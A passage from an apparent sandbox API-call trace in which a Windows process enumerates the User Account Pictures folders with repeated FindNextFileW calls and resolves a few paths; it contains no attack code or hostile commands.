dwReserved1=0x0, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0138.751] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0138.752] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0138.752] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.753] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.753] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29423840, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29423840, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29423840, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz.dat", cAlternateFileName="5P5NRG~1.DAT")) returned 1 [0138.753] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0138.753] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="guest.bmp", cAlternateFileName="")) returned 1 [0138.754] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp", cAlternateFileName="")) returned 1 [0138.754] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="user.bmp", cAlternateFileName="")) returned 0 [0138.754] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0138.754] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0138.754] CoTaskMemFree (pv=0x4e1c10) [0138.754] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.755] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures", lpFilePart=0x0) returned 0x3f [0138.756] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80366a76, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80366a76, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0138.757] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xda0a8861, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0138.757] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae24f474, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae24f474, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb5a2927, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0138.757] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2755d1, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2755d1, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb6d3417, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0138.757] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae29b72e, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae29b72e, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb76b98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0138.757] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb82a065, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0138.757] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdbb95fd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0138.758] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae30db45, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae30db45, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdca9c9ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0138.758] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc3f8f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0138.758] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc65a55, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0138.758] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae359dff, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae359dff, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc8bbb3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0138.758] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae37ff5c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae37ff5c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdccb1d11, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0138.759] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd069f3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0138.759] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd09009d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0138.759] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3cc216, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3cc216, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd0b61fb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile23.bmp", cAlternateFileName="")) returned 1 [0138.759] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd232fa7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile24.bmp", cAlternateFileName="")) returned 1 [0138.759] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd259105, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile25.bmp", cAlternateFileName="")) returned 1 [0138.760] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3f2373, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3f2373, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd27f263, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile26.bmp", cAlternateFileName="")) returned 1 [0138.760] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4184d0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4184d0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd2a53c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0138.760] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3177db, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile28.bmp", cAlternateFileName="")) returned 1 [0138.760] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43e62d, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae43e62d, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd33d939, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile29.bmp", cAlternateFileName="")) returned 1 [0138.760] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae46478a, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae46478a, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile30.bmp", cAlternateFileName="")) returned 1 [0138.760] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd3fc00f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile31.bmp", cAlternateFileName="")) returned 1 [0138.761] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae48a8e7, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae48a8e7, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd42216d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile32.bmp", cAlternateFileName="")) returned 1 [0138.761] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4b0a44, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4b0a44, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd4482cb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile33.bmp", cAlternateFileName="")) returned 1 [0138.761] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9c9561, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile34.bmp", cAlternateFileName="")) returned 1 [0138.761] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile35.bmp", cAlternateFileName="")) returned 1 [0138.761] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae548fb8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae548fb8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd9ef6bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile36.bmp", cAlternateFileName="")) returned 1 [0138.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae595272, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae595272, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0138.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5bb3cf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5bb3cf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile38.bmp", cAlternateFileName="")) returned 1 [0138.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5e152c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5e152c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc2ab41, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile39.bmp", cAlternateFileName="")) returned 1 [0138.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae607689, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae607689, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddc50c9f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile40.bmp", cAlternateFileName="")) returned 1 [0138.762] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae62d7e6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae62d7e6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddcc30b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0138.763] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddce9217, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile42.bmp", cAlternateFileName="")) returned 1 [0138.763] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd0f375, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile43.bmp", cAlternateFileName="")) returned 1 [0138.763] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddd354d3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile44.bmp", cAlternateFileName="")) returned 1 [0138.763] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0138.766] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: 